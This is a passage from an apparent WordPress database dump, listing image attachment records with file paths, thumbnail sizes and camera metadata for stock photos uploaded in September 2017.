:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(955,225,'_wp_attached_file','2017/09/bank-20795_1280.jpg'),(956,225,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:27:\"2017/09/bank-20795_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"bank-20795_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"bank-20795_1280-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"bank-20795_1280-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"bank-20795_1280-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(957,226,'_wp_attached_file','2017/09/banknote-15801_1280.jpg'),(958,226,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:31:\"2017/09/banknote-15801_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"banknote-15801_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"banknote-15801_1280-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"banknote-15801_1280-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banknote-15801_1280-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(959,227,'_wp_attached_file','2017/09/business-18107_1280.jpg'),(960,227,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:31:\"2017/09/business-18107_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"business-18107_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"business-18107_1280-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"business-18107_1280-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"business-18107_1280-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(961,228,'_wp_attached_file','2017/09/coins-1523383_1280.jpg'),(962,228,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:30:\"2017/09/coins-1523383_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"coins-1523383_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"coins-1523383_1280-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"coins-1523383_1280-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"coins-1523383_1280-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"25\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:13:\"Canon EOS 70D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"200\";s:3:\"iso\";s:3:\"800\";s:13:\"shutter_speed\";s:17:\"0.016666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(963,229,'_wp_attached_file','2017/09/drugs-206150_1280.jpg'),(964,229,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:850;s:4:\"file\";s:29:\"2017/09/drugs-206150_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"drugs-206150_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"drugs-206150_1280-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"drugs-206150_1280-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"drugs-206150_1280-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(965,230,'_wp_attached_file','2017/09/moremoney.jpg'),(966,230,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:949;s:4:\"file\";s:21:\"2017/09/moremoney.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"moremoney-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"moremoney-300x222.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:222;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"moremoney-768x569.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:569;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"moremoney-1024x759.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:759;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(967,231,'_wp_attached_file','2017/09/norfolk.jpg'),(968,231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:960;s:6:\"height\";i:676;s:4:\"file\";s:19:\"2017/09/norfolk.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"norfolk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"norfolk-300x211.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:211;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"norfolk-768x541.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:541;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:37:\"http://maxpixel.freegreatpicture.com/\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:42:\"Sea Fun Seaside Family Summer Beach Mother\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:21:\"Copyright by MaxPixel\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:42:\"Sea Fun Seaside Family Summer Beach Mother\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:1:{i:0;s:218:\"Family,Beach,Fun,Seaside,Summer,Mother,Sea,Father,People,Happy,Child,Sand,Family On Beach,Happiness,Girl,Daughter,Outdoors,Sky,Ocean,Together,Love,Parent,Relaxation,Family Fun,Togetherness,MaxPixel,FreeGreatPicture.com\";}}}'),(969,232,'_wp_attached_file','2017/09/pound-414418_1280.jpg'),(970,232,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:29:\"2017/09/pound-414418_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"pound-414418_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"pound-414418_1280-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"pound-414418_1280-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"pound-414418_1280-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(971,233,'_wp_attached_file','2017/09/s.jpg'),(972,233,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:13:\"2017/09/s.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:13:\"s-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:13:\"s-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"s-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:14:\"s-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 650D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(973,234,'_wp_attached_file','2017/09/glasses-272399_1280.jpg'),(974,234,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:31:\"2017/09/glasses-272399_1280.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"glasses-272399_1280-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"glasses-272399_1280-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"glasses-272399_1280-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"glasses-272399_1280-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(975,235,'_wp_attached_file','2017/09/LAW.jpg'),(976,235,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:15:\"2017/09/LAW.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"LAW-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"LAW-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"LAW-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"LAW-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:23:\"Canon PowerShot SX60 HS\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:6:\"13.302\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:3:\"0.5\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(977,236,'_wp_attached_file','2017/09/computer-keyboard.jpg'),(978,236,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:29:\"2017/09/computer-keyboard.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"computer-keyboard-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"computer-keyboard-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"computer-keyboard-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"computer-keyboard-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(979,237,'_wp_attached_file','2017/09/computer-on-desk.jpg'),(980,237,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:28:\"2017/09/computer-on-desk.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"computer-on-desk-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"computer-on-desk-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"computer-on-desk-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"computer-on-desk-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(981,238,'_wp_attached_file','2017/09/computer-on-desk-2.jpg'),(982,238,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:30:\"2017/09/computer-on-desk-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-2-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-2-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"computer-on-desk-2-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(983,239,'_wp_attached_file','2017/09/computer-on-desk-3.jpg'),(984,239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:30:\"2017/09/computer-on-desk-3.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-3-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-3-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"computer-on-desk-3-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(985,240,'_wp_attached_file','2017/09/computer-on-desk-4.jpg'),(986,240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:30:\"2017/09/computer-on-desk-4.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-4-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-4-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"computer-on-desk-4-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(987,42,'_edit_last','1'),(988,42,'_wp_page_template','default'),(991,241,'fw_options','a:0:{}'),(994,42,'_edit_lock','1506012417:1'),(995,242,'_wp_attached_file','2017/09/computer-on-desk-5.jpg'),(996,242,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:30:\"2017/09/computer-on-desk-5.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-5-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"computer-on-desk-5-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"computer-on-desk-5-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(997,47,'_edit_last','1'),(998,47,'_wp_page_template','default'),(1001,243,'fw_options','a:0:{}'),(1002,47,'_edit_lock','1506015156:1'),(1003,244,'_wp_attached_file','2017/09/computer-screen.jpg'),(1004,244,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:27:\"2017/09/computer-screen.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"computer-screen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"computer-screen-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"computer-screen-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"computer-screen-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1005,245,'_wp_attached_file','2017/09/hands-typing.jpg'),(1006,245,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:24:\"2017/09/hands-typing.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"hands-typing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"h